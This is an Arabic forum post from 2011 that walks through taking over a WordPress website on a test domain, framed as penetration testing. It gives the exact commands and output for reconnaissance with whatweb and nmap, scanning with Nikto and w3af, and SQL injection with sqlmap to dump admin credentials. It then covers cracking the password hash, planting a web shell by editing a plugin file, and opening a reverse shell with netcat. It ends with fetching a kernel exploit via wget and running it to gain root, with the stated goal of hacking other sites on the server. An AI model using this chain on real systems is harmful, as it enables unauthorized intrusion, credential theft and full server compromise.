حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    حصريآ على شبكة عراق تيم اختراق موقع بواسطة ادوات الاختبار Penetration test


    [​IMG]

    صباح الخير عليكم جميعا اعضاء وزوار شبكة عراق تيم

    اليوم معنى موضوع مفيد جدآ


    سوف نبدأ في طرح عدة طرق لاختراق موقع بواسطة ادوات الاختبار


    والتعرف علي وظيفة كل اداة في الشرح عمليا


    والاختراق يبدأ من جمع المعلومات الي اخذ الروت بأذن الله


    لكي نبدأ في اي عملية اختراق لاي موفع علينا اولا جمع معلومات مهمه


    مثل نوع السكربت علي الموقع ايبي السيرفر الويب السيرفر اذا كان اباتشي او غيره


    السيرفر يستخدم لينكس او ويندوز الشرح سوف يكون علي دومين افتراضي


    الان ستخدم احدي اختبار الاختراق وهي
    Whatweb تعطيك جميع المعلومات عن الموقع :

    نفتح الاداة ونكتب الامر بعدها رابط الموقع ثل الصوره


    [​IMG]


    الان نلاحظ المعلومات التي ضهرت لنا


    [​IMG]


    الان ظهر الايبي واصدار الاباتشي
    (2.2.15) والسيرفر يعمل علي (fedora linux) والسكربت (wordpress)

    هذه جميع المعلومات المهمه التي نحتاجها الان نحتاج لمعرفة البورتات المفتوحه في السيرفر


    وذلك عن طريق الاداة العملاقه
    Nmap طبعا توجد واجهه رسوميه لها وسهلة الاستخدام

    ولكني افضل العمل علي الطرفيه الان نكتب في الطرفيه nmap


    ثم للعثور علي الورتات المفتوحه nmap -sV hack-test.com


    ثم نري النتيجه


    كود PHP:
    root@bt:/# nmap -sV hack-test.com

    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
    Nmap scan report for hack-test.com (192.168.1.2)
    Host is up (0.0013s latency).
    Not shown: 998 filtered ports
    PORT STATE SERVICE VERSION
    22
    /tcp closed ssh
    80
    /tcp open http Apache httpd 2.2.15 ((Fedora))
    MAC Address: 00:0C:29:01:8A:4D (VMware)

    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

    Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds



    ثم هذا الامر لنري الملقم يعني السيرفر ويندوز او لينكس واي توزيعه بالتحديد nmap -O hack-test.com

    هذه النتيجه


    كود PHP:
    root@bt:/# nmap -O hack-test.com

    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
    Nmap scan report for hack-test.com (192.168.1.2)
    Host is up (0.00079s latency).
    Not shown: 998 filtered ports
    PORT STATE SERVICE
    22
    /tcp closed ssh

    80
    /tcp open http
    MAC Address
    : 00:0C:29:01:8A:4D (VMware)
    Device type: general purpose
    Running
    : Linux 2.6.X
    OS details
    : Linux 2.6.22 (Fedora Core 6)
    Network Distance: 1 hop

    OS detection performed
    . Please report any incorrect results at http://nmap.org/submit/ .

    Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds


    الان ماذا نستنتج من هذا الفحص السريع نعرف البورت المفتوح

    الخاص به هو
    Port 80 التوزيعه التي يعمل عليها السيرفر Linux 2.6.22(Fedora Core 6)

    الان لدينا نتيجه جيده جدا نأتي الان للأهم وهو المسح

    علي الموقع لأكتشاف الثغرات ونقاط الضعف يعني اي ثغره او خطأ برمجي لنستغله مثل


    Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF


    الان سوف نستخدم اداتين
    W3AF, Nikto وهي موجوده في الباك تراك فقط

    لاني جربت اكثر من توزيعة اختبار امان ولم اجدها وهذا احد اسباب انتقالي الي الباك تراك


    المهم وضيفة هذه الادوات عمل مسح علي الموقع للكشف عن الاخطاء البرمجيه


    والثغرات الامنيه والدوال الخطيره المفتوحه نفتح الاداة Nikto ثم نكتب هذا الامر


    perl nikto.pl -h Level 1

    ونري النتيجه


    كود PHP:
    - Nikto v2.1.4

    ---------------------------------------------------------------------------

    +
    Target IP: 192.168.1.2
    + Target Hostname: hack-test.com
    + Target Port: 80
    + Start Time: 2011-12-29 06:50:03

    ---------------------------------------------------------------------------

    +
    Server: Apache/2.2.15 (Fedora)
    +
    ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
    + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
    +
    Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-3268: /icons/: Directory indexing found.
    +
    OSVDB-3233: /icons/README: Apache default file found.
    +
    6448 items checked: 1 error(s) and 6 item(s) reported on remote host
    + End Time: 2011-12-29 06:50:37 (34 seconds)

    ---------------------------------------------------------------------------

    +
    1 host(s) tested


    [​IMG]

    [​IMG]

    الان نفتح الاداة الثانيه W3AF ونكتب بها هذا الامر ./w3af_gui

    كود PHP:
    root@bt:/pentest/web/w3af# ./w3af_gui

    Starting w3af, running on:
    Python version:
    2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
    [
    GCC 4.4.3]
    GTK version: 2.20.1
    PyGTK version
    : 2.17.0

    w3af
    - Web Application Attack and Audit Framework
    Version
    : 1.2
    Revision
    : 4605
    Author
    : Andres Riancho and the w3af team.


    [​IMG]

    تفتح لنا الواجهه الرسوميه نكتب بها رابط الموقع فقط مثل الصور

    [​IMG]

    بعد الانتظار قليلا سوف تظهر لك النتائج والمثال في الصوره القادمه

    [​IMG]

    نري في الصوره انت الموقع به ثغرت SQL و XSS

    نري ثغرة الــ SQL


    [​IMG]

    حيث ان الرابط الموضح في الصوره في مكان الثغره والنقطه الاضعف

    لذلك دعونا نستغل هذه الثغره


    [​IMG]


    سوف نجد ان هذا النوع من الحقن فشل لذلك سوف نستخدم نوع sqlmap

    ولكن يجب ان نكتب قبل الرابط
    http:// مهمه جدا تابع الصور تتحدث

    [​IMG]


    بعد لحظات سوف نري


    [​IMG]


    اكتب y ثم اضغط انتر للمتابعه


    [​IMG]


    كما نري في الصوره السابقه انه الموقع معرض لثغرة
    sql vulnerable واصدار قاعدة البيانات

    هو الخامس 5


    الان سوف نعثر علي كافة قواعد البيانات علي الموقع بأضافة
    “–dbs ”

    [​IMG]


    الان عثرنا علي 3 قواعد بيانات


    [​IMG]


    سوف نقوم بعرض جداول الورد برس بواسطة اضافة
    “–D wordpress –tables ”

    [​IMG]


    الان ظهرت لدينا الجداول


    [​IMG]


    [​IMG]

    الي الان كل شي تمام نريد معرفة اهم شئ من الجداول وهي جداول الـ “wp_users”

    لانها تحتوي علي اسم المدير وكلمة السر للدخول بها الي لوحة تحكم الورد بريس لرفع الشل


    واستخراج جدول اليوزر بأضافة
    “-T wp_users –columns ”

    [​IMG]

    الان وجدنا 22 عمود


    [​IMG]

    نحن فقط نحتاج الي اعمدة (user_login and user_pass ) لاستخراج اسم المدير والباسوورد

    نضيف
    -C user_login,user_pass –dump

    سوف تظهر لنا اسم المستخدم والباسوورد

    [​IMG]


    الان لدينا مشكله بسيطه وهي الباسوورد طبعا دائما يكون مشفر ونحتاج الي فكه

    توجد عدة طرق لذلك ولكن سوف اذكر اسهلها واسرعها وهو هذا الموقع


    Online Hash Crack MD5 / LM / NTLM / SHA1 / MySQL5 / MySQL323 / MD4 / WPA / WPA2 - Passwords recovery - Reverse hash lookup Online - Hash Calculator

    نكتب الهاش الرقم المشفر ثم نري النتيجه


    [​IMG]



    الباسوورد هو
    q1w2e3

    اليوزر GeorgeMiller


    نذهب الي لوحة تحكم الورد بريس ضيف هذه بعد الرابط
    “wp-admin ”

    [​IMG]

    ثم ندخل الي

    [​IMG]


    الان نحتاج الي رفع شل علي السيرفر لذلك ندخل الي plugin ثم نختار Textile


    [​IMG]

    ثم نختار edit it

    [​IMG]

    الان نستبدل هذا المحتوي بمحتوي الشل ونضغط update file

    [​IMG]

    الان الشل سوف يعمل ولكن نحتاج الي اخذ الروت علي السيرفر لاختراق باقي المواقع

    علي السيرفر لذلك نختار الاتصال العكسي نختار
    back-connect ثم نضع الايبي الخاص بنا

    ورقم البورت الذي سوف يتم من خلاله الاتصال


    [​IMG]

    الان نذهب الي الطرفيه ونكتب الامر nc -lvvp 5555 حيث 5555 هو البورت الذي يتم من خلاله الاتصال

    [​IMG]


    الان تم الاتصال


    [​IMG]


    الان نجرب بعض اوامر اللينكس مثل
    id لاظهار الصلاحيات علي السيرفر

    uid=48(apache) gid=489(apache) groups=489(apache)


    والامر
    pwd لمعرفة مكانك علي السيرفر

    [​IMG]

    الان نستخدم الامر uname -a لأظهار الكيرنال الخاص بسيرفر

    هذا الناتج الذي ظهر
    kernel version is 2.6.31.5-127.fc12.1686 وهو كيرنال السيرفر

    الان توجه الي موقع
    exploit-db.com ونكتب في البحث “kernel 2.6.31 ”

    سوف تظهر لدينا الكيرنالات بعدة اصدارات وتحديثات نختار المنايب والمطابق منها

    جلبت لكم احدها الخاصه بهذا الكيرنال للتوضيح


    Linux RDS Protocol Local Privilege Escalation


    الان بعد ان اخترنا الكيرنل المناسب ننسخ الرابط الخاص بها ونضع هذا المر في الطرفيه
    wget وبعدها

    رابط الكيرنال الذي اخترناه ونسخنه رابطه يعني الامر يكون بهذا الشكل


    wget http://www.exploit-db.com/download/15285 -O roro.c

    استخدمنا الامر
    -O لتسميته الي roro.c

    ويتم حفظ الاسم بأمتداد c يعني لغة السي لان الثغره تكون مكتوبة بهذه اللغه


    الان نكتب
    gcc roro.c –o roro

    [​IMG]


    ثم نشغل الثغره بواطة هذا الامر
    ./roro

    الان نكتب الامر
    id لمعرفة صلاحياتنا علي السيرفر

    نري انها اصبحت
    uid=0(root) gid=0(root)

    [​IMG]



    اتمني ان يكون الشرح مفهوم وبسيط واعتذر منكم علي الاطاله


    تحياتي
    </ul>
    ряоfеѕѕіопаL معجب بهذا




    pwvdN ugn af;m uvhr jdl hojvhr l,ru f,hs'm h],hj hghojfhv Penetration test​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة